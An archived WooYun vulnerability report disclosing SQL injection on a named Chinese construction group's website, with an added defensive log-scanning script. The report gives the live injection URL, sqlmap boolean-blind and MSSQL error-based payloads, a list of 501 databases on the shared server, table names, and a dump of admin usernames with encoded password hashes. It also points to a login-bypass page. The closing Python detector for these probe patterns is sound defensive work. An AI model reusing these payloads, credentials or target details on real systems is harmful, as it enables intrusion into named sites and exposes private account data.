WooYun (WooYun.org) historical vulnerability lookup---http://wy.zone.ci/
WooYun Drops articles online reader--------http://drop.zone.ci/
2015-12-10: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly.
2016-01-17: The vendor has actively ignored the vulnerability; details are now disclosed to the public.
SQL injection on the Fanhua Group main site, affecting more than 500 databases and sites
Injection point: http://www.fanhua.net.cn/2xwdt_1jtxw_xx.aspx?nid=16774
Fanhua Group was originally an enterprise directly under the national Ministry of Construction. It is a modern enterprise set up to explore reform of urban construction and the construction industry, and to put into practice urban construction, engineering general contracting and whole-process management of construction projects.
sqlmap identified the following injection point(s) with a total of 30 HTTP(s) requests:
---
Parameter: nid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: nid=16774 AND 6727=6727

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: nid=16774 AND 2548=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(122)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (2548=2548) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(112)+CHAR(113)+CHAR(113)))
---
web server operating system: Windows
web application technology: ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
current database: 'DB_31964'
current user is DBA: False
available databases [501]:
[*] 111
[*] allflex_com_cn
[*] andly_com
[*] andlypack_com
[*] auroragroup_com_cn
[*] baida_finance_com
[*] banyano_com
[*] baolong_biz
[*] bestfeel_net
[*] biadma_com
[*] bjaptps_org
[*] bkmasic_cn
[*] blueprint_com_cn
[*] bmwood_com
[*] bonovo_baa_com
[*] careri_com
[*] ccmaz_com
[*] ceia_org_cn
[*] centerland_com_cn
[*] Charles
[*] china_ether_com
[*] chinagoldrich_com
[*] chinajl_com_cn
[*] chinatitan_com
[*] choicemmed_com
[*] chontdo_com
[*] cigia_org_cn
[*] cimco_com_cn
[*] cn_chinacib_com
[*] coagi_com_cn
[*] cocom_cn
[*] cs_glux_com_cn
[*] cuug_com
[*] cwsforum_com
[*] cycs_com_cn
[*] cycshj_cn
[*] cyfw_com_cn
[*] DB_10445
[*] DB_11190
[*] DB_11191
[*] DB_11227
[*] DB_11789
[*] DB_11832
[*] DB_11892
[*] DB_12209
[*] DB_12720
[*] DB_12729
[*] DB_12766
[*] DB_12906
[*] DB_12907
[*] DB_13053
[*] DB_13392
[*] DB_13901
[*] DB_14294
[*] DB_14295
[*] DB_14320
[*] DB_14586
[*] DB_14755
[*] DB_15144
[*] DB_15159
[*] DB_15529
[*] DB_15549
[*] DB_15582
[*] DB_15786
[*] DB_15787
[*] DB_15852
[*] DB_15964
[*] DB_16393
[*] DB_16432
[*] DB_16809
[*] DB_16942
[*] DB_17020
[*] DB_17071
[*] DB_17659
[*] DB_17680
[*] DB_17848
[*] DB_17851
[*] DB_17859
[*] DB_17903
[*] DB_18104
[*] DB_18105
[*] DB_18131
[*] DB_18181
[*] DB_18632
[*] DB_18828
[*] DB_18884
[*] DB_19385
[*] DB_19386
[*] DB_19391
[*] DB_19454
[*] DB_19455
[*] DB_19456
[*] DB_19461
[*] DB_19530
[*] DB_19547
[*] DB_19655
[*] DB_20094
[*] DB_20225
[*] DB_20267
[*] DB_20278
[*] DB_20283
[*] DB_20291
[*] DB_20322
[*] DB_20339
[*] DB_20354
[*] DB_20395
[*] DB_20540
[*] DB_20675
[*] DB_20725
[*] DB_20727
[*] DB_20788
[*] DB_20838
[*] DB_20946
[*] DB_21140
[*] DB_21237
[*] DB_21244
[*] DB_21690
[*] DB_21935
[*] DB_21936
[*] DB_21962
[*] DB_22173
[*] DB_22227
[*] DB_22275
[*] DB_22395
[*] DB_22396
[*] DB_22421
[*] DB_22457
[*] DB_22476
[*] DB_22477
[*] DB_22491
[*] DB_22594
[*] DB_22636
[*] DB_22655
[*] DB_22676
[*] DB_22677
[*] DB_22678
[*] DB_22746
[*] DB_22750
[*] DB_22766
[*] DB_22886
[*] DB_22939
[*] DB_22948
[*] DB_23086
[*] DB_23088
[*] DB_23089
[*] DB_23186
[*] DB_23242
[*] DB_23296
[*] DB_23530
[*] DB_23706
[*] DB_23731
[*] DB_23757
[*] DB_23780
[*] DB_23802
[*] DB_23805
[*] DB_23927
[*] DB_23985
[*] DB_23994
[*] DB_24018
[*] DB_24020
[*] DB_24057
[*] DB_24058
[*] DB_24122
[*] DB_24241
[*] DB_24243
[*] DB_24293
[*] DB_24318
[*] DB_24363
[*] DB_24424
[*] DB_24425
[*] DB_24476
[*] DB_24493
[*] DB_24518
[*] DB_24553
[*] DB_24554
[*] DB_24555
[*] DB_24556
[*] DB_24557
[*] DB_24558
[*] DB_24559
[*] DB_24560
[*] DB_24564
[*] DB_24568
[*] DB_24569
[*] DB_24612
[*] DB_24613
[*] DB_24615
[*] DB_24618
[*] DB_24638
[*] DB_24690
[*] DB_24721
[*] DB_24736
[*] DB_24741
[*] DB_24832
[*] DB_24838
[*] DB_24875
[*] DB_24933
[*] DB_24958
[*] DB_24975
[*] DB_25033
[*] DB_25114
[*] DB_25119
[*] DB_25125
[*] DB_25127
[*] DB_25155
[*] DB_25164
[*] DB_25183
[*] DB_25360
[*] DB_25367
[*] DB_25372
[*] DB_25373
[*] DB_25554
[*] DB_25605
[*] DB_25640
[*] DB_25641
[*] DB_25651
[*] DB_25655
[*] DB_25657
[*] DB_25808
[*] DB_25812
[*] DB_25818
[*] DB_25821
[*] DB_25828
[*] DB_25830
[*] DB_25904
[*] DB_25954
[*] DB_25957
[*] DB_25958
[*] DB_26010
[*] DB_26055
[*] DB_26084
[*] DB_26117
[*] DB_26238
[*] DB_26285
[*] DB_26297
[*] DB_26306
[*] DB_26371
[*] DB_26478
[*] DB_26495
[*] DB_26498
[*] DB_26520
[*] DB_26544
[*] DB_26549
[*] DB_26554
[*] DB_26617
[*] DB_26619
[*] DB_26650
[*] DB_26651
[*] DB_26672
[*] DB_26695
[*] DB_26698
[*] DB_26928
[*] DB_26929
[*] DB_27016
[*] DB_27153
[*] DB_27200
[*] DB_27228
[*] DB_27229
[*] DB_27376
[*] DB_27417
[*] DB_27419
[*] DB_27450
[*] DB_27493
[*] DB_27598
[*] DB_27741
[*] DB_27782
[*] DB_27934
[*] DB_27935
[*] DB_27972
[*] DB_28021
[*] DB_28025
[*] DB_28029
[*] DB_28217
[*] DB_28283
[*] DB_28354
[*] DB_28396
[*] DB_28402
[*] DB_28415
[*] DB_28683
[*] DB_28737
[*] DB_28748
[*] DB_28801
[*] DB_28829
[*] DB_28859
[*] DB_28860
[*] DB_28897
[*] DB_28934
[*] DB_29038
[*] DB_29039
[*] DB_29090
[*] DB_29091
[*] DB_29124
[*] DB_29134
[*] DB_29140
[*] DB_29170
[*] DB_29172
[*] DB_29173
[*] DB_29174
[*] DB_29176
[*] DB_29177
[*] DB_29178
[*] DB_29249
[*] DB_29253
[*] DB_29260
[*] DB_29567
[*] DB_29607
[*] DB_29681
[*] DB_29774
[*] DB_29804
[*] DB_29841
[*] DB_29889
[*] DB_29898
[*] DB_29913
[*] DB_29917
[*] DB_29974
[*] DB_29976
[*] DB_30087
[*] DB_30425
[*] DB_30461
[*] DB_30462
[*] DB_30471
[*] DB_30552
[*] DB_30568
[*] DB_30573
[*] DB_30587
[*] DB_30595
[*] DB_30597
[*] DB_30613
[*] DB_30629
[*] DB_30713
[*] DB_30714
[*] DB_30715
[*] DB_30727
[*] DB_30972
[*] DB_31125
[*] DB_31133
[*] DB_31144
[*] DB_31145
[*] DB_31172
[*] DB_31205
[*] DB_31209
[*] DB_31218
[*] DB_31224
[*] DB_31265
[*] DB_31280
[*] DB_31298
[*] DB_31299
[*] DB_31382
[*] DB_31403
[*] DB_31454
[*] DB_31479
[*] DB_31480
[*] DB_31482
[*] DB_31484
[*] DB_31489
[*] DB_31507
[*] DB_31531
[*] DB_31548
[*] DB_31563
[*] DB_31609
[*] DB_31721
[*] DB_31743
[*] DB_31744
[*] DB_31790
[*] DB_31839
[*] DB_31877
[*] DB_31907
[*] DB_31936
[*] DB_31938
[*] DB_31964
[*] DB_31970
[*] DB_31973
[*] DB_31987
[*] DB_31993
[*] DB_32067
[*] DB_32092
[*] DB_32167
[*] DB_32226
[*] DB_32253
[*] DB_32264
[*] DB_32266
[*] DB_32377
[*] DB_32580
[*] DB_32709
[*] DB_32732
[*] DB_32739
[*] DB_32746
[*] DB_32824
[*] DB_32834
[*] DB_32902
[*] DB_32932
[*] DB_33161
[*] DB_33179
[*] DB_33190
[*] DB_33217
[*] DB_33223
[*] DB_33224
[*] DB_33299
[*] DB_33333
[*] DB_33401
[*] DB_33402
[*] DB_33404
[*] DB_33405
[*] DB_33417
[*] DB_4198
[*] DB_4199
[*] DB_4200
[*] DB_4201
[*] DB_4249
[*] DB_4255
[*] DB_4278
[*] DB_4317
[*] DB_4331
[*] DB_4353
[*] DB_4367
[*] DB_4626
[*] DB_4717
[*] DB_5517
[*] DB_5562
[*] DB_5566
[*] DB_5567
[*] DB_5887
[*] DB_5888
[*] DB_6170
[*] DB_6171
[*] DB_6293
[*] DB_6541
[*] DB_6542
[*] DB_7048
[*] DB_7068
[*] DB_7070
[*] DB_7625
[*] DB_7854
[*] DB_8091
[*] DB_8203
[*] DB_8204
[*] DB_8213
[*] DB_8219
[*] DB_8244
[*] DB_8481
[*] DB_8603
[*] DB_8695
[*] DB_8699
[*] DB_8724
[*] DB_8731
[*] DB_8735
[*] DB_8888
[*] DB_9417
[*] DB_9457
[*] dovercorporation_com
[*] e_wanjie_com
[*] en_ccmaz_com
[*] en_chinacib_com
[*] en_enhalor_com
[*] enecal_com
[*] enhalor_com
[*] enlegendsilicon_com_
[*] esan_com_cn
[*] euroart_com_cn
[*] evialis_com_cn
[*] fullman_asset
[*] hfkbio_com
[*] hq_b_com
[*] hualongpawn_com
[*] invivo_nsa_com_cn
[*] jingxijiaxiao_com_cn
[*] jloil_com_cn
[*] kingdomtravel_com_cn
[*] lampearl_net
[*] longsheng
[*] luhuadui_com
[*] lusunwyatt_com
[*] master
[*] mdc365_cn
[*] model
[*] msdb
[*] navisystem_com_cn
[*] nccnchina_org_cn
[*] newstar_travel_com
[*] rbgyfz_com_cn
[*] sebiec_com
[*] shiningad_com
[*] sianjia_com
[*] silversun_com_cn
[*] sinopetroleum_com
[*] snccity_com
[*] supercomfort_cn
[*] sureaa_com
[*] sxhdzy_cn
[*] tempdb
[*] ticci_cn
[*] um_hanyi_com_cn
[*] xg_com_cn
[*] xihuahotel_com
[*] xingchuandesign_com
[*] xinyaschool_com
[*] yuancefund_com
[*] zepasia_com
[*] zippovip_com
[*] zjql
[*] zssteelpipe_com
Tables in the current database:
Database: DB_31964
[60 tables]
+-----------------------+
| D99_CMD               |
| D99_REG               |
| D99_Tmp               |
| DIY_TEMPCOMMAND_TABLE |
| S3_Tmp                |
| cms_ad_class          |
| cms_ad_file           |
| cms_ad_mess           |
| cms_admin_files       |
| cms_admin_menu        |
| cms_admin_role        |
| cms_admin_user        |
| cms_admin_userrole    |
| cms_area_city         |
| cms_area_news_column  |
| cms_area_news_info    |
| cms_area_province     |
| cms_bq_info           |
| cms_config            |
| cms_files_images      |
| cms_files_info        |
| cms_files_kind        |
| cms_friend_info       |
| cms_gg_info           |
| cms_hy_info           |
| cms_hy_jf             |
| cms_jytd_news_column  |
| cms_jytd_news_info    |
| cms_magazine_column   |
| cms_magazine_info     |
| cms_maps_info         |
| cms_member_info       |
| cms_member_kind       |
| cms_member_level      |
| cms_member_point      |
| cms_menu_list         |
| cms_message_center    |
| cms_news_column       |
| cms_news_comments     |
| cms_news_info         |
| cms_news_moban        |
| cms_news_pic          |
| cms_person_info       |
| cms_position_info     |
| cms_qixia_column      |
| cms_qixia_info        |
| cms_question_info     |
| cms_related_news      |
| cms_relates_our       |
| cms_reply_info        |
| cms_role_function     |
| cms_shenqing_info     |
| cms_smtp              |
| cms_user_column       |
| cms_ziliao            |
| comdlist              |
| dtproperties          |
| jiaozhu               |
| kill_kk               |
| oldnews               |
+-----------------------+
Administrator table:
Database: DB_31964
Table: cms_admin_user
[11 entries]
+---------------+-------------+--------+----------+----------+--------------------+--------------+----------+--------------------------+--------------------+
| UUID          | column_uuid | IS_USE | USERNAME | is_child | END_TIME           | PASSWORD     | ADD_TIME | USER_TYPE                | START_TIME         |
+---------------+-------------+--------+----------+----------+--------------------+--------------+----------+--------------------------+--------------------+
| 6fc4a95308661 | +           | 1      | liufan   | +        | +                  | 7L1qpW8a9sM= | +        | +                        | +                  |
| admin         | 0           | 1      | admin    | 1        | 08+15+2006++4:28PM | 52ZW7p7z9eM= | +        | %u7cfb%u7edf%u7528%u6237 | 08+15+2006++4:28PM |
| c0a891025143  | +           | 1      | zxgl     | +        | +                  | zj/7svcAwGE= | +        | +                        | +                  |
| c0a891047010  | +           | 1      | cskf     | +        | +                  | zj/7svcAwGE= | +        | +                        | +                  |
| c0a89106401   | +           | 1      | jcss     | +        | +                  | V7NeHE+IO4s= | +        | +                        | +                  |
| c0a891067359  | +           | 1      | fhhw     | +        | +                  | zj/7svcAwGE= | +        | +                        | +                  |
| c0a891070451  | +           | 1      | fhjs     | +        | +                  | zj/7svcAwGE= | +        | +                        | +                  |
| c0a891072027  | +           | 1      | cyy      | +        | +                  | zj/7svcAwGE= | +        | +                        | +                  |
| c0a89107679   | +           | 1      | rlzy     | +        | +                  | zj/7svcAwGE= | +        | +                        | +                  |
| c0a89107935   | +           | 1      | kcsj     | +        | +                  | zj/7svcAwGE= | +        | +                        | +                  |
| c0a891092319  | +           | 1      | fhdc     | +        | +                  | zj/7svcAwGE= | +        | +                        | +                  |
+---------------+-------------+--------+----------+----------+--------------------+--------------+----------+--------------------------+--------------------+
The backend management page is also injectable; a universal-password login works: http://www.fanhua.net.cn/manage/login.aspx
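The sqlmap output above shows exactly what the two probe families look like on the wire: a numeric tautology (`AND 6727=6727`) for the boolean-based blind check, and a `CONVERT(INT, ... CHAR(n) ...)` expression for the MSSQL error-based check. The following script is an editor's added example, not code from the original WooYun report, showing how a defender would spot those shapes in web server access logs after the fact. The log lines are constructed in a simplified IIS W3C layout (date, time, cs-uri-stem, cs-uri-query, sc-status); the field layout, the function names and the rule labels are all assumptions of this example.

```python
"""Flag SQL injection probe patterns in web server access logs.

Added example (not from the original WooYun report). The log lines below are
constructed in a simplified IIS W3C layout (date time cs-uri-stem cs-uri-query
sc-status); the query strings mimic the payload shapes in the sqlmap output
above so the server-side view of those probes is visible.
"""
import re
from typing import Dict, List
from urllib.parse import unquote_plus

# Constructed sample log (assumption: one request per line, five space-separated fields,
# and the query string is stored URL-encoded, as IIS writes it).
SAMPLE_LOG = """\
2015-12-10 10:01:02 /2xwdt_1jtxw_xx.aspx nid=16774 200
2015-12-10 10:01:03 /2xwdt_1jtxw_xx.aspx nid=16774%20AND%206727%3D6727 200
2015-12-10 10:01:04 /2xwdt_1jtxw_xx.aspx nid=16774%20AND%202548%3DCONVERT(INT,(SELECT%20CHAR(113)%2BCHAR(112))) 500
2015-12-10 10:01:05 /2xwdt_1jtxw_xx.aspx nid=16775 200
2015-12-10 10:01:06 /manage/login.aspx user=admin 200
"""

# Detection rules keyed by a label; each is applied to the URL-decoded query string.
RULES: Dict[str, re.Pattern] = {
    # "AND 6727=6727" style tautology from boolean-based blind probing. The
    # backreference requires the same number on both sides, so ordinary
    # numeric parameters such as "nid=16774" never match.
    "boolean_tautology": re.compile(r"\bAND\s+(\d+)\s*=\s*\1\b", re.IGNORECASE),
    # CONVERT(INT, ... CHAR(n) ...) is the MSSQL error-based shape: the forced
    # conversion error carries the selected string back in the error message.
    "mssql_error_based": re.compile(
        r"CONVERT\s*\(\s*INT\s*,.*?CHAR\s*\(\s*\d+\s*\)", re.IGNORECASE | re.DOTALL
    ),
}


def classify_query(query: str) -> List[str]:
    """Return the labels of every rule that matches the decoded query string."""
    decoded = unquote_plus(query)
    return [label for label, rx in RULES.items() if rx.search(decoded)]


def scan_log(text: str) -> List[dict]:
    """Parse the constructed log layout and return one record per flagged request."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 5:
            continue  # skip blank or malformed lines
        date, time, stem, query, status = fields[:5]
        labels = classify_query(query)
        if labels:
            hits.append({
                "time": f"{date} {time}",
                "path": stem,
                "query": unquote_plus(query),
                "status": int(status),
                "labels": labels,
            })
    return hits


def summarize(hits: List[dict]) -> Dict[str, int]:
    """Count flagged requests per label; this is the number an alert threshold would use."""
    counts: Dict[str, int] = {}
    for hit in hits:
        for label in hit["labels"]:
            counts[label] = counts.get(label, 0) + 1
    return counts


if __name__ == "__main__":
    flagged = scan_log(SAMPLE_LOG)
    for hit in flagged:
        print(hit["time"], hit["path"], hit["status"], ",".join(hit["labels"]), "::", hit["query"])
    print(summarize(flagged))
```

Two design points matter here. The rules run on the decoded query, because the same probe arrives as `%3D`, `=` or `%20` depending on the client, and the tautology rule uses a backreference rather than a fixed `6727=6727` so that it generalizes to any `AND n=n` pair sqlmap or a manual tester might choose. The 500 status on the error-based request is a useful corroborating signal: a run of 5xx responses on one parameter, interleaved with 200s, is the server-side footprint of the error-based technique shown in the sqlmap output.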
Unable to contact the vendor, or the vendor actively refused.